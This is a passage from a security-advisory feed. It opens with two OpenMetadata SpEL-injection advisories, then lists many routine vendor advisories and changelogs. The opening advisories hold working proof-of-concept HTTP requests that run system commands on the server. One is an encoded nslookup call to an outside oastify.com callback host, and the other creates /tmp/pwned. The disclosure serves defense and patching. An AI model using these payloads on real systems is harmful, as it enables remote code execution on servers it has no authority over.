GET /api/v1/policies/validation/condition/%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%54%28%6a%61%76%61%2e%75%74%69%6c%2e%42%61%73%65%36%34%29%2e%67%65%74%44%65%63%6f%64%65%72%28%29%2e%64%65%63%6f%64%65%28%22%62%6e%4e%73%62%32%39%72%64%58%41%67%61%58%70%73%4e%7a%45%33%62%33%42%69%62%57%52%79%5a%57%46%6f%61%33%4a%6f%63%44%4e%72%63%32%70%72%61%47%4a%75%4d%6d%4a%7a%65%6d%67%75%62%32%46%7a%64%47%6c%6d%65%53%35%6a%62%32%30%3d%22%29%29%29 HTTP/2
Host: sandbox.open-metadata.org
Authorization: Bearer <non-admin JWT>
```
- Verify that a file called `/tmp/pwned` was created in the OpenMetadata server

#### Impact
This issue may lead to Remote Code Execution by a registered and authenticated user.

#### Remediation
Use [`SimpleEvaluationContext`](https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/expression/spel/support/SimpleEvaluationContext.html) to exclude *references to Java types, constructors, and bean references*.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5XV3-FM7G-865R
24.04.2024 20:06:01 | maven | [MAVEN:GHSA-8P5R-6MVV-2435] OpenMetadata vulnerable to a SpEL Injection in `PUT /api/v1/events/subscriptions` (`GHSL-2023-251`) (high)

### SpEL Injection in `PUT /api/v1/events/subscriptions` (`GHSL-2023-251`)

***Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability. A user must exist in OpenMetadata and have authenticated themselves to exploit this vulnerability.***

Similarly to the GHSL-2023-250 issue, `AlertUtil::validateExpression` is also called from [`EventSubscriptionRepository.prepare()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EventSubscriptionRepository.java#L69-L83), which can lead to Remote Code Execution.

```java
  @Override
  public void prepare(EventSubscription entity, boolean update) {
    validateFilterRules(entity);
  }

  private void validateFilterRules(EventSubscription entity) {
    // Resolve JSON blobs into Rule object and perform schema based validation
    if (entity.getFilteringRules() != null) {
      List<EventFilterRule> rules = entity.getFilteringRules().getRules();
      // Validate all the expressions in the rule
      for (EventFilterRule rule : rules) {
        AlertUtil.validateExpression(rule.getCondition(), Boolean.class);
      }
      rules.sort(Comparator.comparing(EventFilterRule::getName));
    }
  }
```

`prepare()` is called from [`EntityRepository.prepareInternal()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693) which, in turn, gets called from the [`EntityResource.createOrUpdate()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219):

```java
public Response createOrUpdate(UriInfo uriInfo, SecurityContext securityContext, T entity) {
  repository.prepareInternal(entity, true);

  // If entity does not exist, this is a create operation, else update operation
  ResourceContext<T> resourceContext = getResourceContextByName(entity.getFullyQualifiedName());
  MetadataOperation operation = createOrUpdateOperation(resourceContext);
  OperationContext operationContext = new OperationContext(entityType, operation);
  if (operation == CREATE) {
    CreateResourceContext<T> createResourceContext = new CreateResourceContext<>(entityType, entity);
    authorizer.authorize(securityContext, operationContext, createResourceContext);
    entity = addHref(uriInfo, repository.create(uriInfo, entity));
    return new PutResponse<>(Response.Status.CREATED, entity, RestUtil.ENTITY_CREATED).toResponse();
  }
  authorizer.authorize(securityContext, operationContext, resourceContext);
  PutResponse<T> response = repository.createOrUpdate(uriInfo, entity);
  addHref(uriInfo, response.getEntity());
  return response.toResponse();
}
```

Note that, even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and, therefore, after the SpEL expression has been evaluated.

In order to reach this method, an attacker can send a PUT request to `/api/v1/events/subscriptions` which gets handled by [`EventSubscriptionResource.createOrUpdateEventSubscription()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/events/subscription/EventSubscriptionResource.java#L289):

```java
@PUT
@Operation(
    operationId = "createOrUpdateEventSubscription",
    summary = "Updated an existing or create a new Event Subscription",
    description = "Updated an existing or create a new Event Subscription",
    responses = {
      @ApiResponse(
          responseCode = "200",
          description = "create Event Subscription",
          content = @Content(
              mediaType = "application/json",
              schema = @Schema(implementation = CreateEventSubscription.class))),
      @ApiResponse(responseCode = "400", description = "Bad request")
    })
public Response createOrUpdateEventSubscription(
    @Context UriInfo uriInfo, @Context SecurityContext securityContext, @Valid CreateEventSubscription create) {
  // Only one Creation is allowed for Data Insight
  if (create.getAlertType() == CreateEventSubscription.AlertType.DATA_INSIGHT_REPORT) {
    try {
      repository.getByName(null, create.getName(), repository.getFields("id"));
    } catch (EntityNotFoundException ex) {
      if (ReportsHandler.getInstance() != null && ReportsHandler.getInstance().getReportMap().size() > 0) {
        throw new BadRequestException("Data Insight Report Alert already exists.");
      }
    }
  }
  EventSubscription eventSub = getEventSubscription(create, securityContext.getUserPrincipal().getName());
  Response response = createOrUpdate(uriInfo, securityContext, eventSub);
  repository.updateEventSubscription((EventSubscription) response.getEntity());
  return response;
}
```

This vulnerability was discovered with the help of CodeQL's [Expression language injection (Spring)](https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection/) query.

#### Proof of concept
- Prepare the payload
  - Encode the command to be run (eg: `touch /tmp/pwned`) using Base64 (eg: `dG91Y2ggL3RtcC9wd25lZA==`)
  - Create the SpEL expression to run the system command: `T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode("dG91Y2ggL3RtcC9wd25lZA==")))`
- Send the payload using a valid JWT token:
```http
PUT /api/v1/events/subscriptions HTTP/1.1
Host: localhost:8585
Authorization: Bearer <non-admin JWT>
accept: application/json
Connection: close
Content-Type: application/json
Content-Length: 353

{"name":"ActivityFeedAlert","displayName":"Activity Feed Alerts","alertType":"ChangeEvent","filteringRules":{"rules":[{"name":"pwn","effect":"exclude","condition":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('dG91Y2ggL3RtcC9wd25lZA==')))"}]},"subscriptionType":"ActivityFeed","enabled":true}
```
- Verify that a file called `/tmp/pwned` was created in the OpenMetadata server

#### Impact
This issue may lead to Remote Code Execution.

#### Remediation
Use [`SimpleEvaluationContext`](https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/expression/spel/support/SimpleEvaluationContext.html) to exclude *references to Java types, constructors, and bean references*.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8P5R-6MVV-2435
24.04.2024 19:00:00cisco[CISCO-SA-ASAFTD-WEBSRVS-DOS-X8GNUCD2] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial of Service Vulnerability (high)A vulnerability in the management and VPN web servers for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition.This vulnerability is due to incomplete error checking when parsing an HTTP header. An attacker could exploit this vulnerability by sending a crafted HTTP request to a targeted web server on a device. A successful exploit could allow the attacker to cause a DoS condition when the device reloads.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.For more information on the vulnerability that is described in this advisory, see Cisco Event Response: Attacks Against Cisco Firewall Platforms ["https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-WEBSRVS-DOS-X8GNUCD2
24.04.2024 19:00:00cisco[CISCO-SA-ASAFTD-PERSIST-RCE-FLSNXF4H] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability (high)A vulnerability in a legacy capability that allowed for the preloading of VPN clients and plug-ins and that has been available in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. Administrator-level privileges are required to exploit this vulnerability.This vulnerability is due to improper validation of a file when it is read from system flash memory. An attacker could exploit this vulnerability by copying a crafted file to the disk0: file system of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the affected device after the next reload of the device, which could alter system behavior. Because the injected code could persist across device reboots, Cisco has raised the Security Impact Rating (SIR) of this advisory from Medium to High.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.For more information on the vulnerability that is described in this advisory, see Cisco Event Response: Attacks Against Cisco Firewall Platforms ["https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-PERSIST-RCE-FLSNXF4H
24.04.2024 19:00:00cisco[CISCO-SA-ASAFTD-CMD-INJ-ZJV8WYSM] Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability (medium)A vulnerability in the Cisco Adaptive Security Appliance (ASA) restore functionality that is available in Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system with root-level privileges. Administrator-level privileges are required to exploit this vulnerability.This vulnerability exists because the contents of a backup file are improperly sanitized at restore time. An attacker could exploit this vulnerability by restoring a crafted backup file to an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system as root.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.For more information on the vulnerability that is described in this advisory, see Cisco Event Response: Attacks Against Cisco Firewall Platforms ["https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ASAFTD-CMD-INJ-ZJV8WYSM
24.04.2024 08:23:38ubuntu[USN-6748-1] Sanitize vulnerabilities (medium)Several security issues were fixed in Sanitize.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6748-1
24.04.2024 07:43:24ubuntu[USN-6747-1] Firefox vulnerabilitiesSeveral security issues were fixed in Firefox.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6747-1
24.04.2024 03:00:00cisa[CISA-2024:0424] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0424
24.04.2024 08:27:29composer[PHP:MDANTER-ECC-2024-04-24] Cryptographic side-channels in PHPECChttps://secdb.nttzen.cloud/security-advisory/composer/PHP:MDANTER-ECC-2024-04-24
24.04.2024 18:14:27rustsec[RUSTSEC-2024-0338] Arithmetic overflows in cosmwasm-std
Some mathematical operations in `cosmwasm-std` use wrapping math instead of panicking on overflow for very big numbers. This can lead to wrong calculations in contracts that use these operations.

Affected functions:
- `Uint{256,512}::pow` / `Int{256,512}::pow`
- `Int{256,512}::neg`

Affected if `overflow-checks = true` is not set:
- `Uint{64,128}::pow` / `Int{64,128}::pow`
- `Int{64,128}::neg`
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0338
24.04.2024 03:00:00oraclelinux[ELSA-2024-2033] libreswan security and bug fix update (moderate)
[4.12-1.0.1.1]
- Add libreswan-oracle.patch to detect Oracle Linux distro
[4.12-1.1]
- Fix CVE-2024-2357 (RHEL-29734)
- x509: unpack IPv6 general names based on length (RHEL-32719)
[4.12-1]
- Update to 4.12 to fix CVE-2023-38710, CVE-2023-38711, CVE-2023-38712
- Resolves: rhbz#2215956
[4.9-5]
- Just bumping up the version to include bugs for CVE-2023-2295. There is no code fix for it. Fix for it is including the code fix for CVE-2023-30570.
- Fix CVE-2023-2295 Regression of CVE-2023-30570 fixes in the Red Hat Enterprise Linux
- Resolves: rhbz#2189777, rhbz#2190148
[4.9-4]
- Just bumping up the version as an incorrect 9.3 build was created.
- Related: rhbz#2187171
[4.9-3]
- Fix CVE-2023-30570: Malicious IKEv1 Aggressive Mode packets can crash libreswan
- Resolves: rhbz#2187171
[4.9-2]
- Fix CVE-2023-23009: remote DoS via crafted TS payload with an incorrect selector length (rhbz#2173674)
[4.9-1]
- Update to 4.9. Resolves: rhbz#2128669
- Switch to using %autopatch as in Fedora
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2033
24.04.2024 17:13:51rustsec[RUSTSEC-2024-0337] The crate `zip_next` has been renamed to `zip`.Please switch to the new name. `zip_next` will receive no further releases.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0337
26.04.2024 01:23:15ubuntu[USN-6754-1] nghttp2 vulnerabilities (high)Several security issues were fixed in nghttp2.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6754-1
25.04.2024 23:59:19ubuntu[USN-6753-1] CryptoJS vulnerability (critical)CryptoJS could be made to expose sensitive information.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6753-1
25.04.2024 23:13:57ubuntu[USN-6751-1] Zabbix vulnerabilities (medium)Zabbix could allow reflected cross-site scripting (XSS) attacks.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6751-1
26.04.2024 02:34:45maven[MAVEN:GHSA-MV64-86G8-CQQ7] Quarkus: security checks in resteasy reactive may trigger a denial of service (moderate)A flaw was discovered in the RESTEasy Reactive implementation in Quarkus. Due to security checks for some JAX-RS endpoints being performed after serialization, more processing resources are consumed while the HTTP request is checked. In certain configurations, if an attacker has knowledge of any POST, PUT, or PATCH request paths, they can potentially identify vulnerable endpoints and trigger excessive resource usage as the endpoints process the requests. This can result in a denial of service.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MV64-86G8-CQQ7
25.04.2024 22:57:36maven[MAVEN:GHSA-9WMF-XF3H-R8PR] Jberet: jberet-core logging database credentials (moderate)A vulnerability was found in jberet-core logging. An exception in 'dbProperties' might display user credentials such as the username and password for the database-connection.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9WMF-XF3H-R8PR
25.04.2024 22:54:41maven[MAVEN:GHSA-25W4-HFQG-4R52] Quarkus: authorization flaw in quarkus resteasy reactive and classic (moderate)A flaw was found in Quarkus. When a Quarkus RestEasy Classic or Reactive JAX-RS endpoint has its methods declared in the abstract Java class or customized by Quarkus extensions using the annotation processor, the authorization of these methods will not be enforced if it is enabled by either 'quarkus.security.jaxrs.deny-unannotated-endpoints' or 'quarkus.security.jaxrs.default-roles-allowed' properties.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-25W4-HFQG-4R52
25.04.2024 21:03:46slackware[SSA:2024-116-01] libarchive (high)
New libarchive packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/libarchive-3.7.3-i586-2_slack15.0.txz: Rebuilt.
  Patched an out-of-bound error in the rar e8 filter that could allow for
  the execution of arbitrary code.
  Thanks to gmgf for the heads-up.
  For more information, see:
    https://github.com/advisories/GHSA-2jc9-36w4-pmqw
    https://www.cve.org/CVERecord?id=CVE-2024-26256
  (* Security fix *)
```

**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libarchive-3.7.3-i586-2_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libarchive-3.7.3-x86_64-2_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libarchive-3.7.3-i586-2.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libarchive-3.7.3-x86_64-2.txz

**MD5 signatures**
Slackware 15.0 package:
52740a0d6b013049b82d69ed3f84b8be  libarchive-3.7.3-i586-2_slack15.0.txz

Slackware x86_64 15.0 package:
182956f6064878e1f981297c3cf21d63  libarchive-3.7.3-x86_64-2_slack15.0.txz

Slackware -current package:
360dd49a8f464b91f1f484f2c3cd5973  l/libarchive-3.7.3-i586-2.txz

Slackware x86_64 -current package:
e557e74eda420e85669c2cc7eb9b2500  l/libarchive-3.7.3-x86_64-2.txz

**Installation instructions**
Upgrade the package as root:
`# upgradepkg libarchive-3.7.3-i586-2_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-116-01
25.04.2024 17:39:56ubuntu[USN-6752-1] FreeRDP vulnerabilities (critical)Several security issues were fixed in FreeRDP.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6752-1
25.04.2024 13:15:08alpinelinux[ALPINE:CVE-2024-25583] pdns-recursor vulnerability (high)[From CVE-2024-25583] A crafted response from an upstream server the recursor has been configured to forward-recurse to can cause a Denial of Service in the Recursor. The default configuration of the Recursor does not use recursive forwarding and is not affected.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-25583
25.04.2024 10:15:45alpinelinux[ALPINE:CVE-2023-6237] openssl vulnerability
[From CVE-2023-6237] Issue summary: Checking excessively long invalid RSA public keys may take a long time.

Impact summary: Applications that use the function EVP_PKEY_public_check() to check RSA public keys may experience long delays. Where the key that is being checked has been obtained from an untrusted source this may lead to a Denial of Service.

When function EVP_PKEY_public_check() is called on RSA public keys, a computation is done to confirm that the RSA modulus, n, is composite. For valid RSA keys, n is a product of two or more large primes and this computation completes quickly. However, if n is an overly large prime, then this computation would take a long time.

An application that calls EVP_PKEY_public_check() and supplies an RSA key obtained from an untrusted source could be vulnerable to a Denial of Service attack.

The function EVP_PKEY_public_check() is not called from other OpenSSL functions; however, it is called from the OpenSSL pkey command line application. For that reason that application is also vulnerable if used with the '-pubin' and '-check' options on untrusted data.

The OpenSSL SSL/TLS implementation is not affected by this issue.

The OpenSSL 3.0 and 3.1 FIPS providers are affected by this issue.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-6237
25.04.2024 06:24:59ubuntu[USN-6750-1] Thunderbird vulnerabilitiesSeveral security issues were fixed in Thunderbird.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6750-1
25.04.2024 03:00:00debian[DSA-5674-1] pdns-recursor (high)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5674-1
25.04.2024 03:00:00oraclelinux[ELSA-2024-1902] shim security update (important)
[15.8-4.0.1]
- Add support for Oracle signed shim [Orabug: 36540084]
- Add shim binaries signed with Oracle Secure Boot Signing (key 1) [Orabug: 36540084]
[15.8-1.0.3]
- Update shimx64.efi, shimia32.efi and shimaa64.efi v15.8 signed by Microsoft [Orabug: 36072863]
[15.8-1.0.2]
- Use binaries with correct shim.ol generation [Orabug: 36072863]
- Set SBAT_AUTOMATIC_DATE=2021030218 [Orabug: 36072863]
[15.8-1.0.1]
- Update to 15.8 [Orabug: 36072863]
- fix CVE-2023-40546, CVE-2023-40547, CVE-2023-40548, CVE-2023-40549, CVE-2023-40550, CVE-2023-40551 [Orabug: 36072863]
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1902
25.04.2024 03:00:00oraclelinux[ELSA-2024-2055] buildah security update (important)
[1.31.5-1.0.1]
- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117178]
[1:1.31.5-1]
- update to the latest content of https://github.com/containers/buildah/tree/release-1.31 (https://github.com/containers/buildah/commit/5fd539c)
- Resolves: RHEL-26775
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2055
26.04.2024 19:03:18go[GO-2024-2744] Access control change may take longer than expected in github.com/authelia/authelia/v4If the file authentication backend is being used, the watch option is set to true, the refresh interval is configured to a non-disabled value, and an administrator changes a user's groups, then that user may be able to access resources that their previous groups had access to.https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2744
26.04.2024 19:03:05go[GO-2024-2743] XSS vulnerability via personal website in github.com/apache/incubator-answerhttps://secdb.nttzen.cloud/security-advisory/go/GO-2024-2743
26.04.2024 03:00:00debian[DSA-5675-1] chromiumsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5675-1
28.04.2024 03:00:00freebsd[FREEBSD:B3AFFEE8-04D1-11EF-8928-901B0EF714D4] py-social-auth-app-django -- Improper Handling of Case SensitivityGitHub Advisory Database: Python Social Auth is a social authentication/registration mechanism. Prior to version 5.4.1, due to default case-insensitive collation in MySQL or MariaDB databases, third-party authentication user IDs are not case-sensitive and could cause different IDs to match. This issue has been addressed by a fix released in version 5.4.1. An immediate workaround would be to change collation of the affected field.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B3AFFEE8-04D1-11EF-8928-901B0EF714D4
26.04.2024 08:01:53maven[MAVEN:GHSA-2WRP-6FG6-HMC5] Spring Framework URL Parsing with Host Validation (high)Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect (https://cwe.mitre.org/data/definitions/601.html) attack or to a SSRF attack if the URL is used after passing validation checks. This is the same as CVE-2024-22259 (https://spring.io/security/cve-2024-22259) and CVE-2024-22243 (https://spring.io/security/cve-2024-22243), but with different input.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2WRP-6FG6-HMC5
29.04.2024 19:44:07ubuntu[USN-6759-1] FreeRDP vulnerabilities (critical)Several security issues were fixed in FreeRDP.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6759-1
29.04.2024 17:19:01ubuntu[USN-6757-1] PHP vulnerabilities (medium)Several security issues were fixed in PHP.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6757-1
29.04.2024 16:04:18ubuntu[USN-6744-3] Pillow vulnerability (medium)Pillow could be made to crash or run programs as an administrator if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6744-3
29.04.2024 14:43:27ubuntu[USN-6734-2] libvirt vulnerabilities (medium)Several security issues were fixed in libvirt.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6734-2
29.04.2024 14:38:34ubuntu[USN-6733-2] GnuTLS vulnerabilities (medium)Several security issues were fixed in GnuTLS.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6733-2
29.04.2024 14:34:42ubuntu[USN-6718-3] curl vulnerabilitiesSeveral security issues were fixed in curl.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6718-3
29.04.2024 14:31:21ubuntu[USN-6729-3] Apache HTTP Server vulnerabilitiesSeveral security issues were fixed in Apache HTTP Server.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6729-3
29.04.2024 14:27:19ubuntu[USN-6737-2] GNU C Library vulnerabilityGNU C Library could be made to crash or run programs if it processed specially crafted data.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6737-2
29.04.2024 14:23:13ubuntu[USN-6755-1] GNU cpio vulnerabilities (medium)GNU cpio could be made to write files outside the target directory.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6755-1
29.04.2024 13:18:57ubuntu[USN-6756-1] less vulnerabilityless could be made to run programs as your login if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6756-1
29.04.2024 07:15:08alpinelinux[ALPINE:CVE-2024-2757] php83 vulnerability (high)[From CVE-2024-2757] In PHP 8.3.* before 8.3.5, function mb_encode_mimeheader() runs endlessly for some inputs that contain long strings of non-space characters followed by a space. This could lead to a potential DoS attack if a hostile user sends data to an application that uses this function. https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-2757
29.04.2024 07:15:08alpinelinux[ALPINE:CVE-2024-3096] php82, php83, php81 vulnerability (medium)[From CVE-2024-3096] In PHP version 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, if a password stored with password_hash() starts with a null byte (\x00), testing a blank string as the password via password_verify() will incorrectly return true.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-3096
29.04.2024 07:15:07alpinelinux[ALPINE:CVE-2024-1874] php83, php82, php81 vulnerability (critical)[From CVE-2024-1874] In PHP versions 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, when using XXXXXXXXX() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell. https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-1874
29.04.2024 07:15:07alpinelinux[ALPINE:CVE-2024-2756] php82, php83, php81 vulnerability (medium)[From CVE-2024-2756] Due to an incomplete fix to CVE-2022-31629 https://github.com/advisories/GHSA-c43m-486j-j32p , network and same-site attackers can set a standard insecure cookie in the victim's browser which is treated as a __Host- or __Secure- cookie by PHP applications. https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-2756
29.04.2024 03:00:00oraclelinux[ELSA-2024-2084] container-tools:4.0 security update (important)
buildah
[1.24.7-1]
- bump to v1.24.7
- Resolves: RHEL-26767
cockpit-podman
conmon
containernetworking-plugins
containers-common
container-selinux
criu
crun
fuse-overlayfs
libslirp
oci-seccomp-bpf-hook
podman
python-podman
runc
[1.1.12-1.0.1]
- rebuild with golang 1.20.12 for CVE-2023-39326
skopeo
slirp4netns
udica
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2084
29.04.2024 03:00:00redhat[RHSA-2024:2084] container-tools:4.0 security update (important)
The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.

Security Fix(es):
* buildah: full container escape at build time (CVE-2024-1753)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2084
29.04.2024 03:00:00redhat[RHSA-2024:2098] container-tools:rhel8 security and bug fix update (important)
The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.

Bug Fix(es):
* container_init_t does not possess ptrace process context [rhel-8.9.0.z] (JIRA:RHEL-28923)

Security Fix(es):
* podman: full container escape at build time (CVE-2024-1753)
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2098
29.04.2024 03:00:00redhat[RHSA-2024:2079] git-lfs security update (important)
Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.

Security Fix(es):
* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288, VU#421644.3)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2079
29.04.2024 03:00:00oraclelinux[ELSA-2024-2080] tigervnc security update (important)
[1.8.0-33.0.1]
- Dropped xorg-CVE-2023-5367.patch, xorg-CVE-2023-6816.patch, xorg-CVE-2023-6377.patch, xorg-CVE-2023-6478.patch, xorg-CVE-2024-0229-1.patch, xorg-CVE-2024-0229-2.patch, xorg-CVE-2024-0229-3.patch, xorg-CVE-2024-21885.patch, xorg-CVE-2024-21886-1.patch, xorg-CVE-2024-21886-2.patch, xorg-dix-fix-use-after-free-in-input-device-shutdown.patch, xorg-CVE-2024-31080.patch, xorg-CVE-2024-31081.patch, xorg-CVE-2024-31082.patch, xorg-CVE-2024-31083.patch, xorg-CVE-2024-31083-followup.patch
[1.8.0-33]
- Fix crash caused by fix for CVE-2024-31083
  Resolves: RHEL-30976
[1.8.0-32]
- Fix CVE-2024-31080 tigervnc: xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents
  Resolves: RHEL-31006
- Fix CVE-2024-31083 tigervnc: xorg-x11-server: Use-after-free in ProcRenderAddGlyphs
  Resolves: RHEL-30976
- Fix CVE-2024-31081 tigervnc: xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice
  Resolves: RHEL-30993
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2080
29.04.2024 03:00:00redhat[RHSA-2024:2080] tigervnc security update (important)
Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):
* xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents (CVE-2024-31080)
* xorg-x11-server: Heap buffer overread/data leakage in ProcXIPassiveGrabDevice (CVE-2024-31081)
* xorg-x11-server: Use-after-free in ProcRenderAddGlyphs (CVE-2024-31083)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:2080
29.04.2024 10:56:05almalinux[ALSA-2024:2055] buildah security update (important)buildah security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2055
29.04.2024 11:47:39almalinux[ALSA-2024:2037] tigervnc security update (important)tigervnc security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2037
29.04.2024 10:55:12almalinux[ALSA-2024:2033] libreswan security and bug fix update (moderate)libreswan security and bug fix updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:2033
